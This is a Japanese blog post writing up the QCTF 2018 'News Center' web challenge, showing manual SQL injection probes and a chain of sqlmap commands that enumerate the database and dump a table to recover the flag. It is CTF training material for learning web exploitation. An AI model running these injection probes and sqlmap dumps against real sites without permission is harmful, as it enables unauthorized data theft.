banner
肥皂的小屋

肥皂的小屋

github
steam
bilibili
douban
tg_channel

QCTF-2018-ニュースセンターの解説

  • なぜ終了した問題の writeup を書くのか:ある CTF トレーニングプラットフォームの問題を解いているからです

まず、ウェブサイトを開きます。検索画面が表示されますが、何も反応がありません:

image

インジェクションができるか試してみます:

  • a':空白の画面
  • a and 1=1:何も返されません
  • a and 1=1 and '%'='%:何も返されません

インジェクションできるものはなさそうです。パケットを見てみましょう、Burp を使用して送信された POST リクエストです:

image

それでは、1.txt として保存し、sqlmap を実行します:
python sqlmap.py -r 1.txt -p search --dbs

image

python sqlmap.py -r 1.txt -p search -D news --tables

image

python sqlmap.py -r 1.txt -p search -D news -T secret_table --columns

image

python sqlmap.py -r 1.txt -p search -D news -T secret_table -C "fl4g,id" --dump

image

フラグを取得しました:QCTF{sq1_inJec7ion_ezzz}

読み込み中...
文章は、創作者によって署名され、ブロックチェーンに安全に保存されています。